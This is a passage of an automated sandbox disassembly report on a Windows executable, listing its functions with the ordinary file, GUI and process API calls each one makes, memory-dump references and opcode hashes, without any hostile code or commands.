                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: f74516db5a5103b658d610fafbcebc5025618c54f4be19b955388ef6570275a8
                                        • Instruction ID: 1586b432ea45d31d1c25fee7a50dee08d8ae35164b056f193bafc64187be0d95
                                        • Opcode Fuzzy Hash: f74516db5a5103b658d610fafbcebc5025618c54f4be19b955388ef6570275a8
                                        • Instruction Fuzzy Hash: D0A001966BD112BC3A0872617E06C7B021DC4DABA63318A1AF842C5982A8815AA61431
                                        Function 00294A02 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 9a7b85dc3dede5f0de905b4420cc481668a2a05f47f9620da2656a87568d1430
                                        • Instruction ID: 1586b432ea45d31d1c25fee7a50dee08d8ae35164b056f193bafc64187be0d95
                                        • Opcode Fuzzy Hash: 9a7b85dc3dede5f0de905b4420cc481668a2a05f47f9620da2656a87568d1430
                                        • Instruction Fuzzy Hash: D0A001966BD112BC3A0872617E06C7B021DC4DABA63318A1AF842C5982A8815AA61431
                                        Function 00294B2E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294B3B
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Pl)uDK)
                                        • API String ID: 1269201914-1997787021
                                        • Opcode ID: bfb46d0963aab7af87a2a3c0b1d0542f10c809060d56be1879ca16086433e056
                                        • Instruction ID: 29139f4cf516620363587cb68ee5f0287d7986979db108ee34971520ac3b2d48
                                        • Opcode Fuzzy Hash: bfb46d0963aab7af87a2a3c0b1d0542f10c809060d56be1879ca16086433e056
                                        • Instruction Fuzzy Hash: 68A022C22BE0033C38083202BE03C3B020CCCC2F2A330A22EF800C00C2A8C00EB30030
                                        Function 00294B7B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294B3B
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Pl)uDK)
                                        • API String ID: 1269201914-1997787021
                                        • Opcode ID: 358e10b33d1dd5fabe12242eff854a7482b8c2930359db4be6518d17f363a3e5
                                        • Instruction ID: 538f68a10b80f60cb66ac694529496e509d08a9915a4af9e488a54cdc2b97db2
                                        • Opcode Fuzzy Hash: 358e10b33d1dd5fabe12242eff854a7482b8c2930359db4be6518d17f363a3e5
                                        • Instruction Fuzzy Hash: CFA022C22BE003BC380832022E03C3B020CC8C2FAA330AA2EF802C00C2A8C00CB30030
                                        Function 00294B71 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294B3B
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Pl)uDK)
                                        • API String ID: 1269201914-1997787021
                                        • Opcode ID: 22fc639b4fc0b2a7c84b8f9c4d2d9eee4915bc2ecf5be65d633ed8850e66f621
                                        • Instruction ID: 538f68a10b80f60cb66ac694529496e509d08a9915a4af9e488a54cdc2b97db2
                                        • Opcode Fuzzy Hash: 22fc639b4fc0b2a7c84b8f9c4d2d9eee4915bc2ecf5be65d633ed8850e66f621
                                        • Instruction Fuzzy Hash: CFA022C22BE003BC380832022E03C3B020CC8C2FAA330AA2EF802C00C2A8C00CB30030
                                        Function 00294B49 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294B3B
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Pl)uDK)
                                        • API String ID: 1269201914-1997787021
                                        • Opcode ID: 40f846b8d78a0d8e5181aa315301bdbb0b563af2bf8af79d767b875ffff010dd
                                        • Instruction ID: 538f68a10b80f60cb66ac694529496e509d08a9915a4af9e488a54cdc2b97db2
                                        • Opcode Fuzzy Hash: 40f846b8d78a0d8e5181aa315301bdbb0b563af2bf8af79d767b875ffff010dd
                                        • Instruction Fuzzy Hash: CFA022C22BE003BC380832022E03C3B020CC8C2FAA330AA2EF802C00C2A8C00CB30030
                                        Function 00294B53 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294B3B
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Pl)uDK)
                                        • API String ID: 1269201914-1997787021
                                        • Opcode ID: 6560ed53c14cc3d9160a400ab88dc92ed481d97532fb04ba1e7a6fc9c26dbc16
                                        • Instruction ID: 538f68a10b80f60cb66ac694529496e509d08a9915a4af9e488a54cdc2b97db2
                                        • Opcode Fuzzy Hash: 6560ed53c14cc3d9160a400ab88dc92ed481d97532fb04ba1e7a6fc9c26dbc16
                                        • Instruction Fuzzy Hash: CFA022C22BE003BC380832022E03C3B020CC8C2FAA330AA2EF802C00C2A8C00CB30030
                                        Function 00294B85 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294B3B
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: Pl)uDK)
                                        • API String ID: 1269201914-1997787021
                                        • Opcode ID: 667fb04e2ce1f96510f94e06ca78e6fc275fd7eef4a4d890cc52188b456b56ac
                                        • Instruction ID: 538f68a10b80f60cb66ac694529496e509d08a9915a4af9e488a54cdc2b97db2
                                        • Opcode Fuzzy Hash: 667fb04e2ce1f96510f94e06ca78e6fc275fd7eef4a4d890cc52188b456b56ac
                                        • Instruction Fuzzy Hash: CFA022C22BE003BC380832022E03C3B020CC8C2FAA330AA2EF802C00C2A8C00CB30030
                                        Function 0027E3D5 Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointer.KERNELBASE(000000FF,?,?,?,?,00000000,?,00000000,0027E3B1,?,?,00000000,?,?,0027CC21,?), ref: 0027E55F
                                        • GetLastError.KERNEL32 ref: 0027E56E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        • Opcode ID: 955acbd7924a6119de24b0b792794cd00f719490085144f98a4359df83c970b1
                                        • Instruction ID: f1841cf3e8ec1291d2ab12775ee52bc23a8185f2073155e9cf603568d2352f5c
                                        • Opcode Fuzzy Hash: 955acbd7924a6119de24b0b792794cd00f719490085144f98a4359df83c970b1
                                        • Instruction Fuzzy Hash: 774114706243568BCF209F24D4986AAB3E5FF5C320F56859DD88D83241E7B0DCA08BB2
                                        Function 0027E772 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FlushFileBuffers.KERNEL32(?), ref: 0027E78C
                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 0027E840
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: File$BuffersFlushTime
                                        • String ID:
                                        • API String ID: 1392018926-0
                                        • Opcode ID: 71eb32f4df11126d3d7e47cf4b147291d88a7168a40290c10cd7ed107e44b4a6
                                        • Instruction ID: 4db1d77bf9b8ad77cbc199faf5a34a563468c6591fe5eb182586b97559f6fdd7
                                        • Opcode Fuzzy Hash: 71eb32f4df11126d3d7e47cf4b147291d88a7168a40290c10cd7ed107e44b4a6
                                        • Instruction Fuzzy Hash: E121E935169242DBCB18DE24C491AABFBE8AF99304F05895CF4C9C3181D739D92CD762
                                        Function 0027E850 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 0027E897
                                        • GetLastError.KERNEL32 ref: 0027E8A4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        • Opcode ID: 44dc67b295f4ffa85333a45bcb3a9a521c79581e6ba24a777f7dbbc4fa79331c
                                        • Instruction ID: 9f72f46559b30f84fb1ad6741aa10e2e148f7e2987da6b03ff155a0348bb0e9f
                                        • Opcode Fuzzy Hash: 44dc67b295f4ffa85333a45bcb3a9a521c79581e6ba24a777f7dbbc4fa79331c
                                        • Instruction Fuzzy Hash: C3112530620301AFEB20DA64C8447A673E9AB09370F618BA8E056D25E0D7B0EC65CB71
                                        Function 00271CE2 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 00271CE9
                                        • GetDlgItem.USER32(?,?), ref: 00271D01
                                          • Part of subcall function 002714A7: _wcslen.LIBCMT ref: 002714B8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3_Item_wcslen
                                        • String ID:
                                        • API String ID: 896027972-0
                                        • Opcode ID: 99293a5d7c3863103c36f1613b094f9bdb2ce2c2c293d81ba6a03e1679493ba1
                                        • Instruction ID: 43653d0e5c8b1b14b5c0c461eecb52e2e177fbb155996c9c0bc93798caf6a5af
                                        • Opcode Fuzzy Hash: 99293a5d7c3863103c36f1613b094f9bdb2ce2c2c293d81ba6a03e1679493ba1
                                        • Instruction Fuzzy Hash: 8901B1716202149BD724EFA8C886BEDB7E8AF58700F04410AF91AA7291CB709A71CF10
                                        Function 002876A7 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(02000000,?,00000002,00000002,?,002876EA,00280B6F), ref: 002876B4
                                        • GetProcessAffinityMask.KERNEL32(00000000,?,002876EA), ref: 002876BB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Process$AffinityCurrentMask
                                        • String ID:
                                        • API String ID: 1231390398-0
                                        • Opcode ID: f5ff05b96d3b35a17f1c9c44c7bfbf9de0cadf2f301d2f794005978e1cc413a8
                                        • Instruction ID: b747b4c88a63b7a0c9fd75c255326eb49d841c8fb71de4160d2d17d336acd682
                                        • Opcode Fuzzy Hash: f5ff05b96d3b35a17f1c9c44c7bfbf9de0cadf2f301d2f794005978e1cc413a8
                                        • Instruction Fuzzy Hash: C9E09237B26517A79F199BA99C099AB779DAA442443344079A413D3240F974ED0547A0
                                        Function 0028F53A Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                        Download Yara Rule
                                        APIs
                                        • GdiplusShutdown.GDIPLUS(?,?,?,?,002A9B73,000000FF), ref: 0028F578
                                        • CoUninitialize.COMBASE(?,?,?,?,002A9B73,000000FF), ref: 0028F57D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: GdiplusShutdownUninitialize
                                        • String ID:
                                        • API String ID: 3856339756-0
                                        • Opcode ID: 046333e5c45287f93442cc16bd7e24acde006e084786da206eccf2fc61133928
                                        • Instruction ID: f9f1238d8b03300426e0a4cf5bd7e7851114f65da6decf23a48f601a89eafdbb
                                        • Opcode Fuzzy Hash: 046333e5c45287f93442cc16bd7e24acde006e084786da206eccf2fc61133928
                                        • Instruction Fuzzy Hash: 07F05E76608954AFC701DF59EC45F4ABBE8FB49760F004266E916D37A0CB75A840CB90
                                        Function 0028E849 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0028E86A
                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0028E871
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: BitmapCreateFromGdipStream
                                        • String ID:
                                        • API String ID: 1918208029-0
                                        • Opcode ID: ed160216268798a2b6509925ec2be5d55532b532092e689f25f68ab5bce58a80
                                        • Instruction ID: 16aee48e8eb6e37e7cad724ecefc2bb298e5fed9a41742a97393fb9a7ce42070
                                        • Opcode Fuzzy Hash: ed160216268798a2b6509925ec2be5d55532b532092e689f25f68ab5bce58a80
                                        • Instruction Fuzzy Hash: 86E09275521218EFCF10EF45CC0179DB7F8EF04350F20805AA88593601D7B0AE10DF90
                                        Function 00271E1F Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: ItemShowWindow
                                        • String ID:
                                        • API String ID: 3351165006-0
                                        • Opcode ID: 351742344e6b39173f03619e46cb1e6b4470fac0a9972d6a2069f2f8339f05ec
                                        • Instruction ID: b40bf2123d7ddccbbfd445645d093f11417c2c4bd8659411c2e455a4fa5269bd
                                        • Opcode Fuzzy Hash: 351742344e6b39173f03619e46cb1e6b4470fac0a9972d6a2069f2f8339f05ec
                                        • Instruction Fuzzy Hash: 0CC0123205C600BECB010BB1EC0DD2ABBA8ABA4212F08CA08B0B9C0060C239C010DF11
                                        Function 00271CC4 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 00271CD2
                                        • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00271CD9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherItemUser
                                        • String ID:
                                        • API String ID: 4250310104-0
                                        • Opcode ID: e10a488c9b3fd62c6d151d094e16b3fc272434ef23ea729b02afc0c86aeb110d
                                        • Instruction ID: ebf07b28acba0dd9a0fc0c3e8ad1243b2f43a7f3e6e4dd02cbc743e48ca81add
                                        • Opcode Fuzzy Hash: e10a488c9b3fd62c6d151d094e16b3fc272434ef23ea729b02afc0c86aeb110d
                                        • Instruction Fuzzy Hash: 64C04C7640C640BFCB015BA1AD1CC2FBFA9EB95311F04C949B5A980120C6758410DF11
                                        Function 002727E0 Relevance: 1.8, APIs: 1, Instructions: 306COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
